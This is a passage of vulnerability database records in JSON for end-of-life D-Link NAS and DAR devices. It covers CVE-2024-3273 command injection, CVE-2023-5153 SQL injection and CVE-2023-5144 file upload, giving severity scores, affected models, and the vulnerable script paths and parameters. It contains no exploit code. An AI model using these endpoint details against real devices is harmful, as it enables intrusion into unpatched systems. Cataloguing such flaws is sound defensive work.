"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dns-321_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dns-321:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dnr-322l_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dnr-322l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dns-323_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dns-323:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dns-325_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dns-325:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dns-326_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dns-326:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dns-327l_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dns-327l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dnr-326_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dnr-326:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dns-340l_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dns-340l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dns-343_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dns-343:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dns-345_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dns-345:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dns-726-4_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dns-726-4:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dns-1100-4_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dns-1100-4:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dns-1200-05_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dns-1200-05:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dns-1550-04_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dns-1550-04:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2024-3273"
}
]
},
"cve": "CVE-2024-3273",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "cna@vuldb.com",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "cna@vuldb.com",
"availabilityImpact": "LOW",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"exploitabilityScore": 3.9,
"impactScore": 3.4,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2024-3273",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2024-3273",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "cna@vuldb.com",
"id": "CVE-2024-3273",
"trust": 1.0,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-003105"
},
{
"db": "NVD",
"id": "CVE-2024-3273"
},
{
"db": "NVD",
"id": "CVE-2024-3273"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L up to 20240403. Affected is an unknown function of the file /cgi-bin/nas_sharing.cgi of the component HTTP GET Request Handler. The manipulation of the argument system leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259284. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced. D-Link DNS-320L firmware, dns-120 firmware, dnr-202l firmware etc. D-Link Systems, Inc. The product contains a command injection vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state",
"sources": [
{
"db": "NVD",
"id": "CVE-2024-3273"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-003105"
}
],
"trust": 1.62
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2024-3273",
"trust": 2.6
},
{
"db": "VULDB",
"id": "259284",
"trust": 1.8
},
{
"db": "DLINK",
"id": "SAP10383",
"trust": 1.8
},
{
"db": "JVNDB",
"id": "JVNDB-2024-003105",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-003105"
},
{
"db": "NVD",
"id": "CVE-2024-3273"
}
]
},
"id": "VAR-202404-0070",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.6929112399999999
},
"last_update_date": "2024-06-05T23:17:51.328000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-77",
"trust": 1.0
},
{
"problemtype": "Command injection (CWE-77) [ others ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-003105"
},
{
"db": "NVD",
"id": "CVE-2024-3273"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "https://github.com/netsecfish/dlink"
},
{
"trust": 1.8,
"url": "https://supportannouncement.us.dlink.com/security/publication.aspx?name=sap10383"
},
{
"trust": 1.8,
"url": "https://vuldb.com/?id.259284"
},
{
"trust": 1.8,
"url": "https://vuldb.com/?submit.304661"
},
{
"trust": 1.0,
"url": "https://vuldb.com/?ctiid.259284"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2024-3273"
},
{
"trust": 0.8,
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-003105"
},
{
"db": "NVD",
"id": "CVE-2024-3273"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "JVNDB",
"id": "JVNDB-2024-003105"
},
{
"db": "NVD",
"id": "CVE-2024-3273"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2024-04-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2024-003105"
},
{
"date": "2024-04-04T01:15:50.387000",
"db": "NVD",
"id": "CVE-2024-3273"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2024-04-19T06:09:00",
"db": "JVNDB",
"id": "JVNDB-2024-003105"
},
{
"date": "2024-06-04T19:20:18.680000",
"db": "NVD",
"id": "CVE-2024-3273"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural \u00a0D-Link\u00a0Systems,\u00a0Inc.\u00a0 Command injection vulnerabilities in the product",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-003105"
}
],
"trust": 0.8
}
}
VAR-202309-0942
Vulnerability from variot - Updated: 2024-06-05 23:11** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in D-Link DAR-8000 up to 20151231. This affects an unknown part of the file /Tool/querysql.php. The manipulation leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-240249 was assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced. D-Link Systems, Inc
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202309-0942",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dar-7000",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "2015-12-31"
},
{
"model": "dar-7000",
"scope": "lte",
"trust": 0.8,
"vendor": "d link",
"version": "dar-7000 firmware 2015-12-31 and earlier"
},
{
"model": "dar-7000",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dar-7000",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-012958"
},
{
"db": "NVD",
"id": "CVE-2023-5153"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dar-7000_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "2015-12-31",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dar-7000:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2023-5153"
}
]
},
"cve": "CVE-2023-5153",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "cna@vuldb.com",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "cna@vuldb.com",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"impactScore": 3.4,
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.5,
"baseSeverity": "Medium",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2023-5153",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2023-5153",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "cna@vuldb.com",
"id": "CVE-2023-5153",
"trust": 1.0,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-012958"
},
{
"db": "NVD",
"id": "CVE-2023-5153"
},
{
"db": "NVD",
"id": "CVE-2023-5153"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in D-Link DAR-8000 up to 20151231. This affects an unknown part of the file /Tool/querysql.php. The manipulation leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-240249 was assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced. D-Link Systems, Inc",
"sources": [
{
"db": "NVD",
"id": "CVE-2023-5153"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-012958"
}
],
"trust": 1.62
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2023-5153",
"trust": 2.6
},
{
"db": "VULDB",
"id": "240249",
"trust": 1.8
},
{
"db": "DLINK",
"id": "SAP10354",
"trust": 1.8
},
{
"db": "JVNDB",
"id": "JVNDB-2023-012958",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-012958"
},
{
"db": "NVD",
"id": "CVE-2023-5153"
}
]
},
"id": "VAR-202309-0942",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 1.0
},
"last_update_date": "2024-06-05T23:11:01.008000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-89",
"trust": 1.0
},
{
"problemtype": "SQL injection (CWE-89) [ others ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-012958"
},
{
"db": "NVD",
"id": "CVE-2023-5153"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "https://github.com/llixixi/cve/blob/main/d-link-dar-8000-10_sql_%20querysql.md"
},
{
"trust": 1.8,
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=sap10354"
},
{
"trust": 1.8,
"url": "https://vuldb.com/?ctiid.240249"
},
{
"trust": 1.8,
"url": "https://vuldb.com/?id.240249"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-5153"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-012958"
},
{
"db": "NVD",
"id": "CVE-2023-5153"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "JVNDB",
"id": "JVNDB-2023-012958"
},
{
"db": "NVD",
"id": "CVE-2023-5153"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-12-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2023-012958"
},
{
"date": "2023-09-25T03:15:09.390000",
"db": "NVD",
"id": "CVE-2023-5153"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-12-19T07:54:00",
"db": "JVNDB",
"id": "JVNDB-2023-012958"
},
{
"date": "2024-06-04T19:18:09.793000",
"db": "NVD",
"id": "CVE-2023-5153"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link\u00a0Systems,\u00a0Inc.\u00a0 of \u00a0dar-7000\u00a0 in the firmware \u00a0SQL\u00a0 Injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-012958"
}
],
"trust": 0.8
}
}
VAR-202309-0932
Vulnerability from variot - Updated: 2024-06-05 23:11** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in D-Link DAR-7000 and DAR-8000 up to 20151231. Affected is an unknown function of the file /sysmanage/updateos.php. The manipulation of the argument file_upload leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-240240. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed that the product is end-of-life. It should be retired and replaced
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202309-0932",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dar-7000",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "20151231"
},
{
"model": "dar-8000",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "20151231"
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2023-5144"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dar-7000_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "20151231",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
